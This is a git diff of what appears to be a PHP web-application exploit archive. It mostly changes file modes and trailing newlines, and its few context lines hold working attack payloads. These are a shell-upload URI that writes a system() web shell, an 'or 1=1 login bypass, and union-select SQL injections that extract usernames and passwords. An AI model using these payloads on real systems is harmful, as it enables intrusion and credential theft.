old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10367.txt b/platforms/php/webapps/10367.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10369.txt b/platforms/php/webapps/10369.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10370.txt b/platforms/php/webapps/10370.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10378.txt b/platforms/php/webapps/10378.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10379.txt b/platforms/php/webapps/10379.txt old mode 100755 new mode 100644 index 6f94f1ddb..c7d0609fa --- a/platforms/php/webapps/10379.txt +++ b/platforms/php/webapps/10379.txt @@ -319,4 +319,4 @@ place and it should be our main goal to achive when coding web applications. [-------------------------------------------------------------------------------------------------] [ EOF ] -[-------------------------------------------------------------------------------------------------] \ No newline at end of file +[-------------------------------------------------------------------------------------------------] \ No newline at end of file diff --git a/platforms/php/webapps/10383.txt b/platforms/php/webapps/10383.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10384.txt b/platforms/php/webapps/10384.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10388.txt b/platforms/php/webapps/10388.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10389.txt b/platforms/php/webapps/10389.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10390.txt b/platforms/php/webapps/10390.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10391.txt b/platforms/php/webapps/10391.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10393.txt b/platforms/php/webapps/10393.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10395.txt b/platforms/php/webapps/10395.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10398.txt b/platforms/php/webapps/10398.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10400.txt b/platforms/php/webapps/10400.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10403.txt b/platforms/php/webapps/10403.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10404.txt b/platforms/php/webapps/10404.txt old mode 100755 new mode 100644 index 8a8098acc..95a4ac75b --- a/platforms/php/webapps/10404.txt +++ b/platforms/php/webapps/10404.txt @@ -65,4 +65,4 @@ ## I Love You **** ## ##################################################################### -© aFiR.Me - 0nly F0r Security 2009 | By Mr.aFiR \ No newline at end of file +© aFiR.Me - 0nly F0r Security 2009 | By Mr.aFiR \ No newline at end of file diff --git a/platforms/php/webapps/10406.txt b/platforms/php/webapps/10406.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10407.txt b/platforms/php/webapps/10407.txt old mode 100755 new mode 100644 index efde89cec..d4fa263a9 --- a/platforms/php/webapps/10407.txt +++ b/platforms/php/webapps/10407.txt @@ -36,7 +36,4 @@ http://site.com/index.php?page=shop.product_details&flypage=shop.flypage&product [#] Thx to - HI Cyber4rt crew [Facebook: Hacker Indonesia] -- all Soldier of Allah, Tecon Crew, Jatimcrew, Indonesian Hacker and specially for YOU - - - \ No newline at end of file +- all Soldier of Allah, Tecon Crew, Jatimcrew, Indonesian Hacker and specially for YOU \ No newline at end of file diff --git a/platforms/php/webapps/10408.txt b/platforms/php/webapps/10408.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10410.txt b/platforms/php/webapps/10410.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10412.txt b/platforms/php/webapps/10412.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10414.txt b/platforms/php/webapps/10414.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10417.txt b/platforms/php/webapps/10417.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10418.txt b/platforms/php/webapps/10418.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10419.txt b/platforms/php/webapps/10419.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10420.txt b/platforms/php/webapps/10420.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10421.txt b/platforms/php/webapps/10421.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10422.txt b/platforms/php/webapps/10422.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10436.txt b/platforms/php/webapps/10436.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10437.txt b/platforms/php/webapps/10437.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10438.txt b/platforms/php/webapps/10438.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10439.txt b/platforms/php/webapps/10439.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10440.txt b/platforms/php/webapps/10440.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10442.txt b/platforms/php/webapps/10442.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10444.txt b/platforms/php/webapps/10444.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10445.txt b/platforms/php/webapps/10445.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10446.txt b/platforms/php/webapps/10446.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10447.txt b/platforms/php/webapps/10447.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10450.txt b/platforms/php/webapps/10450.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10452.txt b/platforms/php/webapps/10452.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10453.txt b/platforms/php/webapps/10453.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10454.txt b/platforms/php/webapps/10454.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10458.txt b/platforms/php/webapps/10458.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10461.txt b/platforms/php/webapps/10461.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10462.txt b/platforms/php/webapps/10462.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10463.txt b/platforms/php/webapps/10463.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10467.txt b/platforms/php/webapps/10467.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10472.txt b/platforms/php/webapps/10472.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10474.txt b/platforms/php/webapps/10474.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10478.txt b/platforms/php/webapps/10478.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10479.txt b/platforms/php/webapps/10479.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10480.txt b/platforms/php/webapps/10480.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10481.txt b/platforms/php/webapps/10481.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10485.txt b/platforms/php/webapps/10485.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10488.txt b/platforms/php/webapps/10488.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1049.php b/platforms/php/webapps/1049.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10492.txt b/platforms/php/webapps/10492.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10493.txt b/platforms/php/webapps/10493.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10494.txt b/platforms/php/webapps/10494.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10495.txt b/platforms/php/webapps/10495.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10497.txt b/platforms/php/webapps/10497.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10498.txt b/platforms/php/webapps/10498.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10499.txt b/platforms/php/webapps/10499.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10500.txt b/platforms/php/webapps/10500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10511.txt b/platforms/php/webapps/10511.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10512.txt b/platforms/php/webapps/10512.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10515.txt b/platforms/php/webapps/10515.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10516.txt b/platforms/php/webapps/10516.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10517.txt b/platforms/php/webapps/10517.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1052.php b/platforms/php/webapps/1052.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10522.txt b/platforms/php/webapps/10522.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10523.txt b/platforms/php/webapps/10523.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10527.txt b/platforms/php/webapps/10527.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10528.txt b/platforms/php/webapps/10528.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10531.txt b/platforms/php/webapps/10531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10532.txt b/platforms/php/webapps/10532.txt old mode 100755 new mode 100644 index 4407057b6..0bbc551b1 --- a/platforms/php/webapps/10532.txt +++ b/platforms/php/webapps/10532.txt @@ -25,4 +25,4 @@ Open Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other versions The following example URI is available: -http://server/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?> \ No newline at end of file +http://server/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?> \ No newline at end of file diff --git a/platforms/php/webapps/10533.txt b/platforms/php/webapps/10533.txt old mode 100755 new mode 100644 index 614a4e91d..4c806c373 --- a/platforms/php/webapps/10533.txt +++ b/platforms/php/webapps/10533.txt @@ -16,4 +16,4 @@ VirtueMart 1.0 is vulnerable; other versions may also be affected. The following example URI is available: -http://server/index.php?page=shop.product_details&flypage=shop.flypage&product_id=[SOA injection] \ No newline at end of file +http://server/index.php?page=shop.product_details&flypage=shop.flypage&product_id=[SOA injection] \ No newline at end of file diff --git a/platforms/php/webapps/10534.txt b/platforms/php/webapps/10534.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10535.txt b/platforms/php/webapps/10535.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10537.txt b/platforms/php/webapps/10537.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10543.txt b/platforms/php/webapps/10543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10545.txt b/platforms/php/webapps/10545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10546.txt b/platforms/php/webapps/10546.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10547.txt b/platforms/php/webapps/10547.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10548.txt b/platforms/php/webapps/10548.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10549.txt b/platforms/php/webapps/10549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10550.txt b/platforms/php/webapps/10550.txt old mode 100755 new mode 100644 index 5acea1fbb..6173aa9e3 --- a/platforms/php/webapps/10550.txt +++ b/platforms/php/webapps/10550.txt @@ -26,4 +26,4 @@ path/index.php?option=com_content&task=view&id=36&Itemid=[Blind SQL] -< -- bug code end of -- > \ No newline at end of file +< -- bug code end of -- > \ No newline at end of file diff --git a/platforms/php/webapps/10552.txt b/platforms/php/webapps/10552.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10555.txt b/platforms/php/webapps/10555.txt old mode 100755 new mode 100644 index 6a9bbc46e..b5021f628 --- a/platforms/php/webapps/10555.txt +++ b/platforms/php/webapps/10555.txt @@ -140,5 +140,4 @@ GESEC Vulnerability-Research Team protects software, services, applications & in / \ ___| | / _ \| __ \\__ \ | | ______ | __)_\ \/ / _ \| | | | \ __\ |/ _ \ / \ (c) \ \_\ \ |_( <_> ) \_\ \/ __ \| |__ /_____/ | \\ ( <_> ) |_| | /| | | ( <_> ) | \ \______ /____/\____/|___ (____ /____/ /_______ / \_/ \____/|____/____/ |__| |__|\____/|___| / - \/ \/ \/ \/ \/ - \ No newline at end of file + \/ \/ \/ \/ \/ \ No newline at end of file diff --git a/platforms/php/webapps/10560.txt b/platforms/php/webapps/10560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10561.txt b/platforms/php/webapps/10561.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10562.txt b/platforms/php/webapps/10562.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10564.txt b/platforms/php/webapps/10564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10566.txt b/platforms/php/webapps/10566.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10567.txt b/platforms/php/webapps/10567.txt old mode 100755 new mode 100644 index 8df7d4c64..6eb53c0c7 --- a/platforms/php/webapps/10567.txt +++ b/platforms/php/webapps/10567.txt @@ -24,4 +24,4 @@ Write This Code : 'or 1=1/* <======= Now Control Bypassed http://server/advance-biz/demo/login.php -################################################## ######################### \ No newline at end of file +################################################## ######################### \ No newline at end of file diff --git a/platforms/php/webapps/10568.txt b/platforms/php/webapps/10568.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10569.txt b/platforms/php/webapps/10569.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10570.txt b/platforms/php/webapps/10570.txt old mode 100755 new mode 100644 index 789ff0ea7..d5a609beb --- a/platforms/php/webapps/10570.txt +++ b/platforms/php/webapps/10570.txt @@ -133,4 +133,4 @@ GESEC Vulnerability-Research Team protects software, services, applications & in / \ ___| | / _ \| __ \\__ \ | | ______ | __)_\ \/ / _ \| | | | \ __\ |/ _ \ / \ (c) \ \_\ \ |_( <_> ) \_\ \/ __ \| |__ /_____/ | \\ ( <_> ) |_| | /| | | ( <_> ) | \ \______ /____/\____/|___ (____ /____/ /_______ / \_/ \____/|____/____/ |__| |__|\____/|___| / - \/ \/ \/ \/ \/ \ No newline at end of file + \/ \/ \/ \/ \/ \ No newline at end of file diff --git a/platforms/php/webapps/10571.txt b/platforms/php/webapps/10571.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10572.txt b/platforms/php/webapps/10572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10574.txt b/platforms/php/webapps/10574.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10575.txt b/platforms/php/webapps/10575.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10578.txt b/platforms/php/webapps/10578.txt old mode 100755 new mode 100644 index 5c0bebe52..feffe0104 --- a/platforms/php/webapps/10578.txt +++ b/platforms/php/webapps/10578.txt @@ -24,4 +24,4 @@ http://server/script path/upload/Shell.php # Master Mind sends Greets To : # # The Electronic Bomb , Twi[L]ight , R3D EYE , Doom[PS] , Mr.BoOoO , AND ALL MEMBERS :) # # # -############################################################################ \ No newline at end of file +############################################################################ \ No newline at end of file diff --git a/platforms/php/webapps/10583.txt b/platforms/php/webapps/10583.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10584.txt b/platforms/php/webapps/10584.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10585.txt b/platforms/php/webapps/10585.txt old mode 100755 new mode 100644 index 7673294a9..0b4890b69 --- a/platforms/php/webapps/10585.txt +++ b/platforms/php/webapps/10585.txt @@ -29,4 +29,4 @@ id=xek' union select null,concat_ws(0x3a,username,password),null,null,n ull,nul //Show post $get_post = mysql_query("SELECT*FROM post WHERE post_id = '$id' AND status = 'published'"); $post_result = mysql_num_rows($get_post); -$post = mysql_fetch_array($get_post); \ No newline at end of file +$post = mysql_fetch_array($get_post); \ No newline at end of file diff --git a/platforms/php/webapps/10586.txt b/platforms/php/webapps/10586.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10587.txt b/platforms/php/webapps/10587.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10588.txt b/platforms/php/webapps/10588.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10590.txt b/platforms/php/webapps/10590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10591.txt b/platforms/php/webapps/10591.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10592.txt b/platforms/php/webapps/10592.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10594.txt b/platforms/php/webapps/10594.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10597.txt b/platforms/php/webapps/10597.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10598.txt b/platforms/php/webapps/10598.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10599.txt b/platforms/php/webapps/10599.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10600.txt b/platforms/php/webapps/10600.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10601.txt b/platforms/php/webapps/10601.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10606.txt b/platforms/php/webapps/10606.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10609.txt b/platforms/php/webapps/10609.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10611.txt b/platforms/php/webapps/10611.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10612.txt b/platforms/php/webapps/10612.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10614.txt b/platforms/php/webapps/10614.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10615.txt b/platforms/php/webapps/10615.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10621.txt b/platforms/php/webapps/10621.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10624.txt b/platforms/php/webapps/10624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10625.txt b/platforms/php/webapps/10625.txt old mode 100755 new mode 100644 index 668ba4956..b53901301 --- a/platforms/php/webapps/10625.txt +++ b/platforms/php/webapps/10625.txt @@ -26,4 +26,4 @@ path/index.php?view=longview&catid=null/**/union/**/select/**/concat(username,0x3a,password),2/**/from/**/jos_users&Itemid=107&option=com_jeemaarticlecollection -< -- bug code end of -- > \ No newline at end of file +< -- bug code end of -- > \ No newline at end of file diff --git a/platforms/php/webapps/10626.txt b/platforms/php/webapps/10626.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10629.txt b/platforms/php/webapps/10629.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10633.txt b/platforms/php/webapps/10633.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10640.txt b/platforms/php/webapps/10640.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10645.txt b/platforms/php/webapps/10645.txt old mode 100755 new mode 100644 index 4091672d9..2c3c0c4bd --- a/platforms/php/webapps/10645.txt +++ b/platforms/php/webapps/10645.txt @@ -139,4 +139,4 @@ More information about Global-Evolution Security ... global-evolution.info / \ ___| | / _ \| __ \\__ \ | | ______ | __)_\ \/ / _ \| | | | \ __\ |/ _ \ / \ (c) \ \_\ \ |_( <_> ) \_\ \/ __ \| |__ /_____/ | \\ ( <_> ) |_| | /| | | ( <_> ) | \ \______ /____/\____/|___ (____ /____/ /_______ / \_/ \____/|____/____/ |__| |__|\____/|___| / - \/ \/ \/ \/ \/ \ No newline at end of file + \/ \/ \/ \/ \/ \ No newline at end of file diff --git a/platforms/php/webapps/10647.txt b/platforms/php/webapps/10647.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10648.txt b/platforms/php/webapps/10648.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10652.txt b/platforms/php/webapps/10652.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10653.txt b/platforms/php/webapps/10653.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10654.txt b/platforms/php/webapps/10654.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10655.txt b/platforms/php/webapps/10655.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10656.txt b/platforms/php/webapps/10656.txt old mode 100755 new mode 100644 index 1b5334cdc..60ed6b99c --- a/platforms/php/webapps/10656.txt +++ b/platforms/php/webapps/10656.txt @@ -22,6 +22,4 @@ http://localhost/path/cat_sell.php?cid=1+union+all+select 1,concat(sb_admin_name [+] example [+] http://www.youtube.com/watch?v=uEK_Ah3htr0 ====================================================================================== -[+]Special Thanks:- Hangaw_hawlery & FormatXformaT and all kurd-security members - - \ No newline at end of file +[+]Special Thanks:- Hangaw_hawlery & FormatXformaT and all kurd-security members \ No newline at end of file diff --git a/platforms/php/webapps/10658.txt b/platforms/php/webapps/10658.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10660.txt b/platforms/php/webapps/10660.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10661.txt b/platforms/php/webapps/10661.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10665.txt b/platforms/php/webapps/10665.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10666.txt b/platforms/php/webapps/10666.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10667.txt b/platforms/php/webapps/10667.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10668.txt b/platforms/php/webapps/10668.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10669.txt b/platforms/php/webapps/10669.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10670.txt b/platforms/php/webapps/10670.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10671.txt b/platforms/php/webapps/10671.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10672.txt b/platforms/php/webapps/10672.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10673.txt b/platforms/php/webapps/10673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10674.txt b/platforms/php/webapps/10674.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10675.txt b/platforms/php/webapps/10675.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10677.txt b/platforms/php/webapps/10677.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10679.txt b/platforms/php/webapps/10679.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10680.txt b/platforms/php/webapps/10680.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10681.txt b/platforms/php/webapps/10681.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10682.txt b/platforms/php/webapps/10682.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10683.txt b/platforms/php/webapps/10683.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10684.txt b/platforms/php/webapps/10684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10685.txt b/platforms/php/webapps/10685.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10687.txt b/platforms/php/webapps/10687.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10688.txt b/platforms/php/webapps/10688.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10689.txt b/platforms/php/webapps/10689.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1069.php b/platforms/php/webapps/1069.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10690.txt b/platforms/php/webapps/10690.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10691.txt b/platforms/php/webapps/10691.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10692.txt b/platforms/php/webapps/10692.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10693.txt b/platforms/php/webapps/10693.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10694.txt b/platforms/php/webapps/10694.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10695.txt b/platforms/php/webapps/10695.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10696.txt b/platforms/php/webapps/10696.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10697.txt b/platforms/php/webapps/10697.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10698.txt b/platforms/php/webapps/10698.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10699.txt b/platforms/php/webapps/10699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10700.txt b/platforms/php/webapps/10700.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10701.txt b/platforms/php/webapps/10701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10703.txt b/platforms/php/webapps/10703.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10704.txt b/platforms/php/webapps/10704.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10705.txt b/platforms/php/webapps/10705.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10706.txt b/platforms/php/webapps/10706.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10707.txt b/platforms/php/webapps/10707.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10708.txt b/platforms/php/webapps/10708.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10710.txt b/platforms/php/webapps/10710.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10711.txt b/platforms/php/webapps/10711.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10712.txt b/platforms/php/webapps/10712.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10716.txt b/platforms/php/webapps/10716.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10717.txt b/platforms/php/webapps/10717.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10718.txt b/platforms/php/webapps/10718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10719.txt b/platforms/php/webapps/10719.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10720.txt b/platforms/php/webapps/10720.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10721.txt b/platforms/php/webapps/10721.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10722.txt b/platforms/php/webapps/10722.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10725.txt b/platforms/php/webapps/10725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10726.txt b/platforms/php/webapps/10726.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10727.txt b/platforms/php/webapps/10727.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10728.txt b/platforms/php/webapps/10728.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10729.txt b/platforms/php/webapps/10729.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10730.txt b/platforms/php/webapps/10730.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10731.txt b/platforms/php/webapps/10731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10732.txt b/platforms/php/webapps/10732.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10733.txt b/platforms/php/webapps/10733.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10734.txt b/platforms/php/webapps/10734.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10735.txt b/platforms/php/webapps/10735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10736.txt b/platforms/php/webapps/10736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10737.txt b/platforms/php/webapps/10737.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10738.txt b/platforms/php/webapps/10738.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10739.txt b/platforms/php/webapps/10739.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10740.txt b/platforms/php/webapps/10740.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10741.txt b/platforms/php/webapps/10741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10742.txt b/platforms/php/webapps/10742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10743.txt b/platforms/php/webapps/10743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10750.txt b/platforms/php/webapps/10750.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10751.txt b/platforms/php/webapps/10751.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10758.txt b/platforms/php/webapps/10758.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10760.txt b/platforms/php/webapps/10760.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10762.txt b/platforms/php/webapps/10762.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10763.txt b/platforms/php/webapps/10763.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10779.txt b/platforms/php/webapps/10779.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10781.txt b/platforms/php/webapps/10781.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10784.txt b/platforms/php/webapps/10784.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10788.txt b/platforms/php/webapps/10788.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10789.txt b/platforms/php/webapps/10789.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10790.txt b/platforms/php/webapps/10790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10793.txt b/platforms/php/webapps/10793.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/10798.txt b/platforms/php/webapps/10798.txt old mode 100755 new mode 100644 diff 